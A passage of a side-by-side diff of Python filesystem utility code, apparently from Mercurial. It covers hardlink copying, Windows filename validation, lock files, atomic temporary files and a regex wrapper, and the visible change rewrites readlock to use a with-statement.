1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 os.stat(os.path.dirname(dst)).st_dev)
1744 os.stat(os.path.dirname(dst)).st_dev)
1745 settopic()
1745 settopic()
1746
1746
1747 if hardlink:
1747 if hardlink:
1748 try:
1748 try:
1749 oslink(src, dst)
1749 oslink(src, dst)
1750 except (IOError, OSError):
1750 except (IOError, OSError):
1751 hardlink = False
1751 hardlink = False
1752 shutil.copy(src, dst)
1752 shutil.copy(src, dst)
1753 else:
1753 else:
1754 shutil.copy(src, dst)
1754 shutil.copy(src, dst)
1755 num += 1
1755 num += 1
1756 if progress:
1756 if progress:
1757 progress.increment()
1757 progress.increment()
1758
1758
1759 return hardlink, num
1759 return hardlink, num
1760
1760
1761 _winreservednames = {
1761 _winreservednames = {
1762 'con', 'prn', 'aux', 'nul',
1762 'con', 'prn', 'aux', 'nul',
1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 }
1765 }
1766 _winreservedchars = ':*?"<>|'
1766 _winreservedchars = ':*?"<>|'
1767 def checkwinfilename(path):
1767 def checkwinfilename(path):
1768 r'''Check that the base-relative path is a valid filename on Windows.
1768 r'''Check that the base-relative path is a valid filename on Windows.
1769 Returns None if the path is ok, or a UI string describing the problem.
1769 Returns None if the path is ok, or a UI string describing the problem.
1770
1770
1771 >>> checkwinfilename(b"just/a/normal/path")
1771 >>> checkwinfilename(b"just/a/normal/path")
1772 >>> checkwinfilename(b"foo/bar/con.xml")
1772 >>> checkwinfilename(b"foo/bar/con.xml")
1773 "filename contains 'con', which is reserved on Windows"
1773 "filename contains 'con', which is reserved on Windows"
1774 >>> checkwinfilename(b"foo/con.xml/bar")
1774 >>> checkwinfilename(b"foo/con.xml/bar")
1775 "filename contains 'con', which is reserved on Windows"
1775 "filename contains 'con', which is reserved on Windows"
1776 >>> checkwinfilename(b"foo/bar/xml.con")
1776 >>> checkwinfilename(b"foo/bar/xml.con")
1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 "filename contains 'AUX', which is reserved on Windows"
1778 "filename contains 'AUX', which is reserved on Windows"
1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 "filename contains ':', which is reserved on Windows"
1780 "filename contains ':', which is reserved on Windows"
1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 "filename contains '\\x07', which is invalid on Windows"
1782 "filename contains '\\x07', which is invalid on Windows"
1783 >>> checkwinfilename(b"foo/bar/bla ")
1783 >>> checkwinfilename(b"foo/bar/bla ")
1784 "filename ends with ' ', which is not allowed on Windows"
1784 "filename ends with ' ', which is not allowed on Windows"
1785 >>> checkwinfilename(b"../bar")
1785 >>> checkwinfilename(b"../bar")
1786 >>> checkwinfilename(b"foo\\")
1786 >>> checkwinfilename(b"foo\\")
1787 "filename ends with '\\', which is invalid on Windows"
1787 "filename ends with '\\', which is invalid on Windows"
1788 >>> checkwinfilename(b"foo\\/bar")
1788 >>> checkwinfilename(b"foo\\/bar")
1789 "directory name ends with '\\', which is invalid on Windows"
1789 "directory name ends with '\\', which is invalid on Windows"
1790 '''
1790 '''
1791 if path.endswith('\\'):
1791 if path.endswith('\\'):
1792 return _("filename ends with '\\', which is invalid on Windows")
1792 return _("filename ends with '\\', which is invalid on Windows")
1793 if '\\/' in path:
1793 if '\\/' in path:
1794 return _("directory name ends with '\\', which is invalid on Windows")
1794 return _("directory name ends with '\\', which is invalid on Windows")
1795 for n in path.replace('\\', '/').split('/'):
1795 for n in path.replace('\\', '/').split('/'):
1796 if not n:
1796 if not n:
1797 continue
1797 continue
1798 for c in _filenamebytestr(n):
1798 for c in _filenamebytestr(n):
1799 if c in _winreservedchars:
1799 if c in _winreservedchars:
1800 return _("filename contains '%s', which is reserved "
1800 return _("filename contains '%s', which is reserved "
1801 "on Windows") % c
1801 "on Windows") % c
1802 if ord(c) <= 31:
1802 if ord(c) <= 31:
1803 return _("filename contains '%s', which is invalid "
1803 return _("filename contains '%s', which is invalid "
1804 "on Windows") % stringutil.escapestr(c)
1804 "on Windows") % stringutil.escapestr(c)
1805 base = n.split('.')[0]
1805 base = n.split('.')[0]
1806 if base and base.lower() in _winreservednames:
1806 if base and base.lower() in _winreservednames:
1807 return _("filename contains '%s', which is reserved "
1807 return _("filename contains '%s', which is reserved "
1808 "on Windows") % base
1808 "on Windows") % base
1809 t = n[-1:]
1809 t = n[-1:]
1810 if t in '. ' and n not in '..':
1810 if t in '. ' and n not in '..':
1811 return _("filename ends with '%s', which is not allowed "
1811 return _("filename ends with '%s', which is not allowed "
1812 "on Windows") % t
1812 "on Windows") % t
1813
1813
1814 if pycompat.iswindows:
1814 if pycompat.iswindows:
1815 checkosfilename = checkwinfilename
1815 checkosfilename = checkwinfilename
1816 timer = time.clock
1816 timer = time.clock
1817 else:
1817 else:
1818 checkosfilename = platform.checkosfilename
1818 checkosfilename = platform.checkosfilename
1819 timer = time.time
1819 timer = time.time
1820
1820
1821 if safehasattr(time, "perf_counter"):
1821 if safehasattr(time, "perf_counter"):
1822 timer = time.perf_counter
1822 timer = time.perf_counter
1823
1823
1824 def makelock(info, pathname):
1824 def makelock(info, pathname):
1825 """Create a lock file atomically if possible
1825 """Create a lock file atomically if possible
1826
1826
1827 This may leave a stale lock file if symlink isn't supported and signal
1827 This may leave a stale lock file if symlink isn't supported and signal
1828 interrupt is enabled.
1828 interrupt is enabled.
1829 """
1829 """
1830 try:
1830 try:
1831 return os.symlink(info, pathname)
1831 return os.symlink(info, pathname)
1832 except OSError as why:
1832 except OSError as why:
1833 if why.errno == errno.EEXIST:
1833 if why.errno == errno.EEXIST:
1834 raise
1834 raise
1835 except AttributeError: # no symlink in os
1835 except AttributeError: # no symlink in os
1836 pass
1836 pass
1837
1837
1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 ld = os.open(pathname, flags)
1839 ld = os.open(pathname, flags)
1840 os.write(ld, info)
1840 os.write(ld, info)
1841 os.close(ld)
1841 os.close(ld)
1842
1842
1843 def readlock(pathname):
1843 def readlock(pathname):
1844 try:
1844 try:
1845 return readlink(pathname)
1845 return readlink(pathname)
1846 except OSError as why:
1846 except OSError as why:
1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 raise
1848 raise
1849 except AttributeError: # no symlink in os
1849 except AttributeError: # no symlink in os
1850 pass
1850 pass
1851 fp = posixfile(pathname, 'rb')
1851 with posixfile(pathname, 'rb') as fp:
1852 r = fp.read()
1852 return fp.read()
1853 fp.close()
1854 return r
1855
1853
1856 def fstat(fp):
1854 def fstat(fp):
1857 '''stat file object that may not have fileno method.'''
1855 '''stat file object that may not have fileno method.'''
1858 try:
1856 try:
1859 return os.fstat(fp.fileno())
1857 return os.fstat(fp.fileno())
1860 except AttributeError:
1858 except AttributeError:
1861 return os.stat(fp.name)
1859 return os.stat(fp.name)
1862
1860
1863 # File system features
1861 # File system features
1864
1862
1865 def fscasesensitive(path):
1863 def fscasesensitive(path):
1866 """
1864 """
1867 Return true if the given path is on a case-sensitive filesystem
1865 Return true if the given path is on a case-sensitive filesystem
1868
1866
1869 Requires a path (like /foo/.hg) ending with a foldable final
1867 Requires a path (like /foo/.hg) ending with a foldable final
1870 directory component.
1868 directory component.
1871 """
1869 """
1872 s1 = os.lstat(path)
1870 s1 = os.lstat(path)
1873 d, b = os.path.split(path)
1871 d, b = os.path.split(path)
1874 b2 = b.upper()
1872 b2 = b.upper()
1875 if b == b2:
1873 if b == b2:
1876 b2 = b.lower()
1874 b2 = b.lower()
1877 if b == b2:
1875 if b == b2:
1878 return True # no evidence against case sensitivity
1876 return True # no evidence against case sensitivity
1879 p2 = os.path.join(d, b2)
1877 p2 = os.path.join(d, b2)
1880 try:
1878 try:
1881 s2 = os.lstat(p2)
1879 s2 = os.lstat(p2)
1882 if s2 == s1:
1880 if s2 == s1:
1883 return False
1881 return False
1884 return True
1882 return True
1885 except OSError:
1883 except OSError:
1886 return True
1884 return True
1887
1885
1888 try:
1886 try:
1889 import re2
1887 import re2
1890 _re2 = None
1888 _re2 = None
1891 except ImportError:
1889 except ImportError:
1892 _re2 = False
1890 _re2 = False
1893
1891
1894 class _re(object):
1892 class _re(object):
1895 def _checkre2(self):
1893 def _checkre2(self):
1896 global _re2
1894 global _re2
1897 try:
1895 try:
1898 # check if match works, see issue3964
1896 # check if match works, see issue3964
1899 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1897 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1900 except ImportError:
1898 except ImportError:
1901 _re2 = False
1899 _re2 = False
1902
1900
1903 def compile(self, pat, flags=0):
1901 def compile(self, pat, flags=0):
1904 '''Compile a regular expression, using re2 if possible
1902 '''Compile a regular expression, using re2 if possible
1905
1903
1906 For best performance, use only re2-compatible regexp features. The
1904 For best performance, use only re2-compatible regexp features. The
1907 only flags from the re module that are re2-compatible are
1905 only flags from the re module that are re2-compatible are
1908 IGNORECASE and MULTILINE.'''
1906 IGNORECASE and MULTILINE.'''
1909 if _re2 is None:
1907 if _re2 is None:
1910 self._checkre2()
1908 self._checkre2()
1911 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1909 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1912 if flags & remod.IGNORECASE:
1910 if flags & remod.IGNORECASE:
1913 pat = '(?i)' + pat
1911 pat = '(?i)' + pat
1914 if flags & remod.MULTILINE:
1912 if flags & remod.MULTILINE:
1915 pat = '(?m)' + pat
1913 pat = '(?m)' + pat
1916 try:
1914 try:
1917 return re2.compile(pat)
1915 return re2.compile(pat)
1918 except re2.error:
1916 except re2.error:
1919 pass
1917 pass
1920 return remod.compile(pat, flags)
1918 return remod.compile(pat, flags)
1921
1919
1922 @propertycache
1920 @propertycache
1923 def escape(self):
1921 def escape(self):
1924 '''Return the version of escape corresponding to self.compile.
1922 '''Return the version of escape corresponding to self.compile.
1925
1923
1926 This is imperfect because whether re2 or re is used for a particular
1924 This is imperfect because whether re2 or re is used for a particular
1927 function depends on the flags, etc, but it's the best we can do.
1925 function depends on the flags, etc, but it's the best we can do.
1928 '''
1926 '''
1929 global _re2
1927 global _re2
1930 if _re2 is None:
1928 if _re2 is None:
1931 self._checkre2()
1929 self._checkre2()
1932 if _re2:
1930 if _re2:
1933 return re2.escape
1931 return re2.escape
1934 else:
1932 else:
1935 return remod.escape
1933 return remod.escape
1936
1934
1937 re = _re()
1935 re = _re()
1938
1936
1939 _fspathcache = {}
1937 _fspathcache = {}
1940 def fspath(name, root):
1938 def fspath(name, root):
1941 '''Get name in the case stored in the filesystem
1939 '''Get name in the case stored in the filesystem
1942
1940
1943 The name should be relative to root, and be normcase-ed for efficiency.
1941 The name should be relative to root, and be normcase-ed for efficiency.
1944
1942
1945 Note that this function is unnecessary, and should not be
1943 Note that this function is unnecessary, and should not be
1946 called, for case-sensitive filesystems (simply because it's expensive).
1944 called, for case-sensitive filesystems (simply because it's expensive).
1947
1945
1948 The root should be normcase-ed, too.
1946 The root should be normcase-ed, too.
1949 '''
1947 '''
1950 def _makefspathcacheentry(dir):
1948 def _makefspathcacheentry(dir):
1951 return dict((normcase(n), n) for n in os.listdir(dir))
1949 return dict((normcase(n), n) for n in os.listdir(dir))
1952
1950
1953 seps = pycompat.ossep
1951 seps = pycompat.ossep
1954 if pycompat.osaltsep:
1952 if pycompat.osaltsep:
1955 seps = seps + pycompat.osaltsep
1953 seps = seps + pycompat.osaltsep
1956 # Protect backslashes. This gets silly very quickly.
1954 # Protect backslashes. This gets silly very quickly.
1957 seps.replace('\\','\\\\')
1955 seps.replace('\\','\\\\')
1958 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1956 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1959 dir = os.path.normpath(root)
1957 dir = os.path.normpath(root)
1960 result = []
1958 result = []
1961 for part, sep in pattern.findall(name):
1959 for part, sep in pattern.findall(name):
1962 if sep:
1960 if sep:
1963 result.append(sep)
1961 result.append(sep)
1964 continue
1962 continue
1965
1963
1966 if dir not in _fspathcache:
1964 if dir not in _fspathcache:
1967 _fspathcache[dir] = _makefspathcacheentry(dir)
1965 _fspathcache[dir] = _makefspathcacheentry(dir)
1968 contents = _fspathcache[dir]
1966 contents = _fspathcache[dir]
1969
1967
1970 found = contents.get(part)
1968 found = contents.get(part)
1971 if not found:
1969 if not found:
1972 # retry "once per directory" per "dirstate.walk" which
1970 # retry "once per directory" per "dirstate.walk" which
1973 # may take place for each patches of "hg qpush", for example
1971 # may take place for each patches of "hg qpush", for example
1974 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1972 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1975 found = contents.get(part)
1973 found = contents.get(part)
1976
1974
1977 result.append(found or part)
1975 result.append(found or part)
1978 dir = os.path.join(dir, part)
1976 dir = os.path.join(dir, part)
1979
1977
1980 return ''.join(result)
1978 return ''.join(result)
1981
1979
1982 def checknlink(testfile):
1980 def checknlink(testfile):
1983 '''check whether hardlink count reporting works properly'''
1981 '''check whether hardlink count reporting works properly'''
1984
1982
1985 # testfile may be open, so we need a separate file for checking to
1983 # testfile may be open, so we need a separate file for checking to
1986 # work around issue2543 (or testfile may get lost on Samba shares)
1984 # work around issue2543 (or testfile may get lost on Samba shares)
1987 f1, f2, fp = None, None, None
1985 f1, f2, fp = None, None, None
1988 try:
1986 try:
1989 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1987 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1990 suffix='1~', dir=os.path.dirname(testfile))
1988 suffix='1~', dir=os.path.dirname(testfile))
1991 os.close(fd)
1989 os.close(fd)
1992 f2 = '%s2~' % f1[:-2]
1990 f2 = '%s2~' % f1[:-2]
1993
1991
1994 oslink(f1, f2)
1992 oslink(f1, f2)
1995 # nlinks() may behave differently for files on Windows shares if
1993 # nlinks() may behave differently for files on Windows shares if
1996 # the file is open.
1994 # the file is open.
1997 fp = posixfile(f2)
1995 fp = posixfile(f2)
1998 return nlinks(f2) > 1
1996 return nlinks(f2) > 1
1999 except OSError:
1997 except OSError:
2000 return False
1998 return False
2001 finally:
1999 finally:
2002 if fp is not None:
2000 if fp is not None:
2003 fp.close()
2001 fp.close()
2004 for f in (f1, f2):
2002 for f in (f1, f2):
2005 try:
2003 try:
2006 if f is not None:
2004 if f is not None:
2007 os.unlink(f)
2005 os.unlink(f)
2008 except OSError:
2006 except OSError:
2009 pass
2007 pass
2010
2008
2011 def endswithsep(path):
2009 def endswithsep(path):
2012 '''Check path ends with os.sep or os.altsep.'''
2010 '''Check path ends with os.sep or os.altsep.'''
2013 return (path.endswith(pycompat.ossep)
2011 return (path.endswith(pycompat.ossep)
2014 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2012 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2015
2013
2016 def splitpath(path):
2014 def splitpath(path):
2017 '''Split path by os.sep.
2015 '''Split path by os.sep.
2018 Note that this function does not use os.altsep because this is
2016 Note that this function does not use os.altsep because this is
2019 an alternative of simple "xxx.split(os.sep)".
2017 an alternative of simple "xxx.split(os.sep)".
2020 It is recommended to use os.path.normpath() before using this
2018 It is recommended to use os.path.normpath() before using this
2021 function if need.'''
2019 function if need.'''
2022 return path.split(pycompat.ossep)
2020 return path.split(pycompat.ossep)
2023
2021
2024 def mktempcopy(name, emptyok=False, createmode=None):
2022 def mktempcopy(name, emptyok=False, createmode=None):
2025 """Create a temporary file with the same contents from name
2023 """Create a temporary file with the same contents from name
2026
2024
2027 The permission bits are copied from the original file.
2025 The permission bits are copied from the original file.
2028
2026
2029 If the temporary file is going to be truncated immediately, you
2027 If the temporary file is going to be truncated immediately, you
2030 can use emptyok=True as an optimization.
2028 can use emptyok=True as an optimization.
2031
2029
2032 Returns the name of the temporary file.
2030 Returns the name of the temporary file.
2033 """
2031 """
2034 d, fn = os.path.split(name)
2032 d, fn = os.path.split(name)
2035 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2033 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2036 os.close(fd)
2034 os.close(fd)
2037 # Temporary files are created with mode 0600, which is usually not
2035 # Temporary files are created with mode 0600, which is usually not
2038 # what we want. If the original file already exists, just copy
2036 # what we want. If the original file already exists, just copy
2039 # its mode. Otherwise, manually obey umask.
2037 # its mode. Otherwise, manually obey umask.
2040 copymode(name, temp, createmode)
2038 copymode(name, temp, createmode)
2041 if emptyok:
2039 if emptyok:
2042 return temp
2040 return temp
2043 try:
2041 try:
2044 try:
2042 try:
2045 ifp = posixfile(name, "rb")
2043 ifp = posixfile(name, "rb")
2046 except IOError as inst:
2044 except IOError as inst:
2047 if inst.errno == errno.ENOENT:
2045 if inst.errno == errno.ENOENT:
2048 return temp
2046 return temp
2049 if not getattr(inst, 'filename', None):
2047 if not getattr(inst, 'filename', None):
2050 inst.filename = name
2048 inst.filename = name
2051 raise
2049 raise
2052 ofp = posixfile(temp, "wb")
2050 ofp = posixfile(temp, "wb")
2053 for chunk in filechunkiter(ifp):
2051 for chunk in filechunkiter(ifp):
2054 ofp.write(chunk)
2052 ofp.write(chunk)
2055 ifp.close()
2053 ifp.close()
2056 ofp.close()
2054 ofp.close()
2057 except: # re-raises
2055 except: # re-raises
2058 try:
2056 try:
2059 os.unlink(temp)
2057 os.unlink(temp)
2060 except OSError:
2058 except OSError:
2061 pass
2059 pass
2062 raise
2060 raise
2063 return temp
2061 return temp
2064
2062
2065 class filestat(object):
2063 class filestat(object):
2066 """help to exactly detect change of a file
2064 """help to exactly detect change of a file
2067
2065
2068 'stat' attribute is result of 'os.stat()' if specified 'path'
2066 'stat' attribute is result of 'os.stat()' if specified 'path'
2069 exists. Otherwise, it is None. This can avoid preparative
2067 exists. Otherwise, it is None. This can avoid preparative
2070 'exists()' examination on client side of this class.
2068 'exists()' examination on client side of this class.
2071 """
2069 """
2072 def __init__(self, stat):
2070 def __init__(self, stat):
2073 self.stat = stat
2071 self.stat = stat
2074
2072
2075 @classmethod
2073 @classmethod
2076 def frompath(cls, path):
2074 def frompath(cls, path):
2077 try:
2075 try:
2078 stat = os.stat(path)
2076 stat = os.stat(path)
2079 except OSError as err:
2077 except OSError as err:
2080 if err.errno != errno.ENOENT:
2078 if err.errno != errno.ENOENT:
2081 raise
2079 raise
2082 stat = None
2080 stat = None
2083 return cls(stat)
2081 return cls(stat)
2084
2082
2085 @classmethod
2083 @classmethod
2086 def fromfp(cls, fp):
2084 def fromfp(cls, fp):
2087 stat = os.fstat(fp.fileno())
2085 stat = os.fstat(fp.fileno())
2088 return cls(stat)
2086 return cls(stat)
2089
2087
2090 __hash__ = object.__hash__
2088 __hash__ = object.__hash__
2091
2089
2092 def __eq__(self, old):
2090 def __eq__(self, old):
2093 try:
2091 try:
2094 # if ambiguity between stat of new and old file is
2092 # if ambiguity between stat of new and old file is
2095 # avoided, comparison of size, ctime and mtime is enough
2093 # avoided, comparison of size, ctime and mtime is enough
2096 # to exactly detect change of a file regardless of platform
2094 # to exactly detect change of a file regardless of platform
2097 return (self.stat.st_size == old.stat.st_size and
2095 return (self.stat.st_size == old.stat.st_size and
2098 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2096 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2099 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2097 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2100 except AttributeError:
2098 except AttributeError:
2101 pass
2099 pass
2102 try:
2100 try:
2103 return self.stat is None and old.stat is None
2101 return self.stat is None and old.stat is None
2104 except AttributeError:
2102 except AttributeError:
2105 return False
2103 return False
2106
2104
2107 def isambig(self, old):
2105 def isambig(self, old):
2108 """Examine whether new (= self) stat is ambiguous against old one
2106 """Examine whether new (= self) stat is ambiguous against old one
2109
2107
2110 "S[N]" below means stat of a file at N-th change:
2108 "S[N]" below means stat of a file at N-th change:
2111
2109
2112 - S[n-1].ctime < S[n].ctime: can detect change of a file
2110 - S[n-1].ctime < S[n].ctime: can detect change of a file
2113 - S[n-1].ctime == S[n].ctime
2111 - S[n-1].ctime == S[n].ctime
2114 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2112 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2115 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2113 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2116 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2114 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2117 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2115 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2118
2116
2119 Case (*2) above means that a file was changed twice or more at
2117 Case (*2) above means that a file was changed twice or more at
2120 same time in sec (= S[n-1].ctime), and comparison of timestamp
2118 same time in sec (= S[n-1].ctime), and comparison of timestamp
2121 is ambiguous.
2119 is ambiguous.
2122
2120
2123 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2121 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2124 timestamp is ambiguous".
2122 timestamp is ambiguous".
2125
2123
2126 But advancing mtime only in case (*2) doesn't work as
2124 But advancing mtime only in case (*2) doesn't work as
2127 expected, because naturally advanced S[n].mtime in case (*1)
2125 expected, because naturally advanced S[n].mtime in case (*1)
2128 might be equal to manually advanced S[n-1 or earlier].mtime.
2126 might be equal to manually advanced S[n-1 or earlier].mtime.
2129
2127
2130 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2128 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2131 treated as ambiguous regardless of mtime, to avoid overlooking
2129 treated as ambiguous regardless of mtime, to avoid overlooking
2132 by confliction between such mtime.
2130 by confliction between such mtime.
2133
2131
2134 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2132 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2135 S[n].mtime", even if size of a file isn't changed.
2133 S[n].mtime", even if size of a file isn't changed.
2136 """
2134 """
2137 try:
2135 try:
2138 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2136 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2139 except AttributeError:
2137 except AttributeError:
2140 return False
2138 return False
2141
2139
2142 def avoidambig(self, path, old):
2140 def avoidambig(self, path, old):
2143 """Change file stat of specified path to avoid ambiguity
2141 """Change file stat of specified path to avoid ambiguity
2144
2142
2145 'old' should be previous filestat of 'path'.
2143 'old' should be previous filestat of 'path'.
2146
2144
2147 This skips avoiding ambiguity, if a process doesn't have
2145 This skips avoiding ambiguity, if a process doesn't have
2148 appropriate privileges for 'path'. This returns False in this
2146 appropriate privileges for 'path'. This returns False in this
2149 case.
2147 case.
2150
2148
2151 Otherwise, this returns True, as "ambiguity is avoided".
2149 Otherwise, this returns True, as "ambiguity is avoided".
2152 """
2150 """
2153 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2151 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2154 try:
2152 try:
2155 os.utime(path, (advanced, advanced))
2153 os.utime(path, (advanced, advanced))
2156 except OSError as inst:
2154 except OSError as inst:
2157 if inst.errno == errno.EPERM:
2155 if inst.errno == errno.EPERM:
2158 # utime() on the file created by another user causes EPERM,
2156 # utime() on the file created by another user causes EPERM,
2159 # if a process doesn't have appropriate privileges
2157 # if a process doesn't have appropriate privileges
2160 return False
2158 return False
2161 raise
2159 raise
2162 return True
2160 return True
2163
2161
2164 def __ne__(self, other):
2162 def __ne__(self, other):
2165 return not self == other
2163 return not self == other
2166
2164
2167 class atomictempfile(object):
2165 class atomictempfile(object):
2168 '''writable file object that atomically updates a file
2166 '''writable file object that atomically updates a file
2169
2167
2170 All writes will go to a temporary copy of the original file. Call
2168 All writes will go to a temporary copy of the original file. Call
2171 close() when you are done writing, and atomictempfile will rename
2169 close() when you are done writing, and atomictempfile will rename
2172 the temporary copy to the original name, making the changes
2170 the temporary copy to the original name, making the changes
2173 visible. If the object is destroyed without being closed, all your
2171 visible. If the object is destroyed without being closed, all your
2174 writes are discarded.
2172 writes are discarded.
2175
2173
2176 checkambig argument of constructor is used with filestat, and is
2174 checkambig argument of constructor is used with filestat, and is
2177 useful only if target file is guarded by any lock (e.g. repo.lock
2175 useful only if target file is guarded by any lock (e.g. repo.lock
2178 or repo.wlock).
2176 or repo.wlock).
2179 '''
2177 '''
2180 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2178 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2181 self.__name = name # permanent name
2179 self.__name = name # permanent name
2182 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2180 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2183 createmode=createmode)
2181 createmode=createmode)
2184 self._fp = posixfile(self._tempname, mode)
2182 self._fp = posixfile(self._tempname, mode)
2185 self._checkambig = checkambig
2183 self._checkambig = checkambig
2186
2184
2187 # delegated methods
2185 # delegated methods
2188 self.read = self._fp.read
2186 self.read = self._fp.read
2189 self.write = self._fp.write
2187 self.write = self._fp.write
2190 self.seek = self._fp.seek
2188 self.seek = self._fp.seek
2191 self.tell = self._fp.tell
2189 self.tell = self._fp.tell
2192 self.fileno = self._fp.fileno
2190 self.fileno = self._fp.fileno
2193
2191
2194 def close(self):
2192 def close(self):
2195 if not self._fp.closed:
2193 if not self._fp.closed:
2196 self._fp.close()
2194 self._fp.close()
2197 filename = localpath(self.__name)
2195 filename = localpath(self.__name)
2198 oldstat = self._checkambig and filestat.frompath(filename)
2196 oldstat = self._checkambig and filestat.frompath(filename)
2199 if oldstat and oldstat.stat:
2197 if oldstat and oldstat.stat:
2200 rename(self._tempname, filename)
2198 rename(self._tempname, filename)
2201 newstat = filestat.frompath(filename)
2199 newstat = filestat.frompath(filename)
2202 if newstat.isambig(oldstat):
2200 if newstat.isambig(oldstat):
2203 # stat of changed file is ambiguous to original one
2201 # stat of changed file is ambiguous to original one
2204 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2202 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2205 os.utime(filename, (advanced, advanced))
2203 os.utime(filename, (advanced, advanced))
2206 else:
2204 else:
2207 rename(self._tempname, filename)
2205 rename(self._tempname, filename)
2208
2206
2209 def discard(self):
2207 def discard(self):
2210 if not self._fp.closed:
2208 if not self._fp.closed:
2211 try:
2209 try:
2212 os.unlink(self._tempname)
2210 os.unlink(self._tempname)
2213 except OSError:
2211 except OSError:
2214 pass
2212 pass
2215 self._fp.close()
2213 self._fp.close()
2216
2214
2217 def __del__(self):
2215 def __del__(self):
2218 if safehasattr(self, '_fp'): # constructor actually did something
2216 if safehasattr(self, '_fp'): # constructor actually did something
2219 self.discard()
2217 self.discard()
2220
2218
2221 def __enter__(self):
2219 def __enter__(self):
2222 return self
2220 return self
2223
2221
2224 def __exit__(self, exctype, excvalue, traceback):
2222 def __exit__(self, exctype, excvalue, traceback):
2225 if exctype is not None:
2223 if exctype is not None:
2226 self.discard()
2224 self.discard()
2227 else:
2225 else:
2228 self.close()
2226 self.close()
2229
2227
2230 def unlinkpath(f, ignoremissing=False, rmdir=True):
2228 def unlinkpath(f, ignoremissing=False, rmdir=True):
2231 """unlink and remove the directory if it is empty"""
2229 """unlink and remove the directory if it is empty"""
2232 if ignoremissing:
2230 if ignoremissing:
2233 tryunlink(f)
2231 tryunlink(f)
2234 else:
2232 else:
2235 unlink(f)
2233 unlink(f)
2236 if rmdir:
2234 if rmdir:
2237 # try removing directories that might now be empty
2235 # try removing directories that might now be empty
2238 try:
2236 try:
2239 removedirs(os.path.dirname(f))
2237 removedirs(os.path.dirname(f))
2240 except OSError:
2238 except OSError:
2241 pass
2239 pass
2242
2240
2243 def tryunlink(f):
2241 def tryunlink(f):
2244 """Attempt to remove a file, ignoring ENOENT errors."""
2242 """Attempt to remove a file, ignoring ENOENT errors."""
2245 try:
2243 try:
2246 unlink(f)
2244 unlink(f)
2247 except OSError as e:
2245 except OSError as e:
2248 if e.errno != errno.ENOENT:
2246 if e.errno != errno.ENOENT:
2249 raise
2247 raise
2250
2248
2251 def makedirs(name, mode=None, notindexed=False):
2249 def makedirs(name, mode=None, notindexed=False):
2252 """recursive directory creation with parent mode inheritance
2250 """recursive directory creation with parent mode inheritance
2253
2251
2254 Newly created directories are marked as "not to be indexed by
2252 Newly created directories are marked as "not to be indexed by
2255 the content indexing service", if ``notindexed`` is specified
2253 the content indexing service", if ``notindexed`` is specified
2256 for "write" mode access.
2254 for "write" mode access.
2257 """
2255 """
2258 try:
2256 try:
2259 makedir(name, notindexed)
